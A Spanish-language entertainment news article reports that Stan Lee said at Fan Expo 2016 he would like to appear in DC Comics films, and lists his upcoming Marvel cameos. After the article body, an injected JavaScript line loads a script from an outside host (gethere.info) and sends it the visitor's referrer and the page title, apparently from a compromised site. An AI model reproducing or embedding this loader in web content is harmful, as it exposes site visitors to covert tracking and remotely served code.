Stan Lee quiere aparecer en las películas de DC Comics

Ya confirmó su aparición en Doctor StrangeGuardians of the Galaxy Vol. 2 y Spider-Man: Homecoming.

El título de esta nota no es un truco publicitario. Stan “The Man” Lee, creador de medio universo Marvel y rey de los cameos, afirmó que le encantaría hacer más apariciones en otros proyectos cinematográficos, incluidas las producciones de Warner Bros. para DC Comics.

“Quiero hacer más apariciones. No tiene que ser una película de Marvel. No sé por qué DC no me ha llamado ¡me podrían usar!”, afirmó Stan durante una sesión de preguntas y respuestas en la “Fan Expo 2016” de Toronto, Canadá:

Este no sería el primer acercamiento que tiene el padre de Marvel con la editorial de Superman. En 2001 apareció la serie Just Imagine Stan Lee… en las que se contaba el origen de los personajes DC con guiones de Stan. 

Aunque a muchos nos encantaría ver a Batman salvar a Stan de la destrucción inminente de un edificio, mientras come un hogdog y grita “¡excélsior!”, en la próxima película de Justice League, es poco probable que lo lleguemos a ver. Sin embargo, Stan si aparecerá en más películas del Universo Marvel. 

Lee, de 93 años, anunció recientemente que actuará en Doctor StrangeGuardians of the Galaxy Vol. 2 y Spider-Man: Homecoming. Con estas tres apariciones llegará a la cifra récord de treinta cameos. 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios